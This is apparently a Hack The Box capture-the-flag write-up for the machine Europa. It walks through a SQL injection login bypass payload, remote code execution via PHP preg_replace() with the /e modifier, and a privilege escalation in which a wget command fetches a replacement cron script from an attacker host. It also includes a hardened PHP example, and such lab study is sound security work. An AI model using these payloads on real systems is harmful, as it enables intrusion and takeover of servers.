HTB Europa (Medium) - Writeup
Difficulty: Medium
Bypassed login page via SQL injection, allowing admin access.
Discovered a vulnerable OpenVPN config generator abusing preg_replace() with the /e modifier for RCE.
Gained a reverse shell using a crafted payload in the ipaddress parameter.
Escalated to root by placing a malicious script in a writable cron-executed directory.
Nmap
The nmap scan revealed three open ports:
Port 80 - Default apache
It serves the default Apache page:
Let’s move on to HTTPS.
Port 443 - https website
The site’s TLS certificate revealed some subdomains:
- admin-portal.europacorp.htb
- www.europacorp.htb
- europacorp.htb
We’ll add them to /etc/hosts.
admin-portal.europacorp.htb contains a login page:
We can try discovering other subdomains:
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://admin-portal.europacorp.htb -H "Host: FUZZ.europacorp.htb" --hw 1049
It didn’t find anything new.
We’ll now run directory busting against the login page; we know it uses PHP, so we’ll add the php extension:
feroxbuster --url https://admin-portal.europacorp.htb/ -x php -k
There are some interesting files like db.php, but we can’t view their source without an LFI or a similar vulnerability.
/logs and /data return a Forbidden response.
SQLi - authentication bypass
We can catch the login request with Burp Suite and add a single quote to the username.
It returns an error, which is a good sign of a possible SQLi vulnerability:
The bypass technique that worked was using a valid username and then commenting out the rest of the query:
admin@europacorp.htb'-- -
The query checks whether the user exists, and the comment removes the password check entirely:
The query that is vulnerable to this bypass looks like this:
SELECT * FROM users WHERE email='$email' and password='$password_hash';
We’re logged in!
Abusing tools.php
There is an OpenVPN config generator tool, located at /tools.php.
Let’s take a look at this request with Burp Suite:
It takes three parameters:
- pattern
- ipaddress
- text
pattern has the value /ip_address/, which looks like a regex.
In PHP, regexes are handled by the preg_ family of functions.
We enter the IP address once, but it is substituted several times in the final config file.
It most likely uses preg_replace to do that.
preg_replace is one of the dangerous PHP functions, because with the right modifier it will execute PHP code.
I recommend reading this article to understand how it works:
https://captainnoob.medium.com/command-execution-preg-replace-php-function-exploit-62d6f746bda4
If we add the "e" modifier to the pattern, we will be able to execute code.
Let’s take a look at article’s exploitation example:
When put together, it looks something like this:
- preg_replace('/a/e', 'system("id")', 'a')
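To make the root cause concrete, here is an added PHP example (not the box’s actual tools.php, whose source is not shown in this writeup) reconstructing the generator as the text infers it, beside a hardened version that takes only the IP address from the client; the field names come from the request above, and the template is constructed.

```php
<?php
// Added example, not the box's own tools.php (its source is not on this page).
// Field names ('pattern', 'ipaddress', 'text') are the request parameters
// named in the writeup; the template further down is constructed.

// As inferred: all three preg_replace() arguments come from the client.
// On PHP < 7.0 a pattern carrying the /e modifier makes preg_replace()
// eval() the replacement string, so whoever controls 'pattern' and
// 'ipaddress' runs PHP on the server. (PHP 7+ removed /e: the call then
// emits a warning and returns NULL, but the design is still wrong.)
function generate_config_vulnerable(array $post): ?string
{
    return preg_replace($post['pattern'], $post['ipaddress'], $post['text']);
}

// Hardened: the client supplies only the IP address, which is validated;
// the placeholder is a server-side constant and the template lives on the
// server. str_replace() is literal, so no regex modifier can ever apply.
const IP_PLACEHOLDER = 'ip_address';

function generate_config_hardened(array $post, string $template): string
{
    $ip = filter_var($post['ipaddress'] ?? '', FILTER_VALIDATE_IP);
    if ($ip === false) {
        throw new InvalidArgumentException('ipaddress must be a valid IPv4/IPv6 address');
    }
    return str_replace(IP_PLACEHOLDER, $ip, $template);
}

// Constructed template: the placeholder appears several times, matching the
// behaviour observed on the page (one input, substituted repeatedly).
$template = "remote ip_address 1194\nroute ip_address 255.255.255.255\n";

// Constructed, valid input from the documentation address range.
echo generate_config_hardened(['ipaddress' => '192.0.2.10'], $template);

// Anything that is not an IP address is rejected before it reaches the config.
try {
    generate_config_hardened(['ipaddress' => 'not-an-ip'], $template);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

Note that the fix is not only the validation: as long as the pattern itself is server-controlled and no regex is used, there is no modifier for a client to add.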
Let’s try it:
It works! Now we need to put a reverse shell there:
And we get a connection back:
Priv Esc to root
First thing I checked was db.php:
MySQL didn’t reveal anything new.
The vulnerable query that allowed authentication bypass was:
There is also a script called clearlogs:
This script is likely executed by a cron job to regularly clear the logs.
With pspy64 we can verify whether it’s running as a cron job:
It does run as a cron job:
- /usr/bin/php /var/www/cronjobs/clearlogs
- /bin/sh -c /var/www/cronjobs/clearlogs
There is a line in this file that is very interesting:
- exec('/var/www/cmd/logcleared.sh');
It turns out that we own the /var/www/cmd directory.
All we need to do now is replace logcleared.sh:
wget http://<attacker ip>/logcleared.sh
Now start a listener and wait for it to execute.
After that we can retrieve both flags:
Thank you for reading!!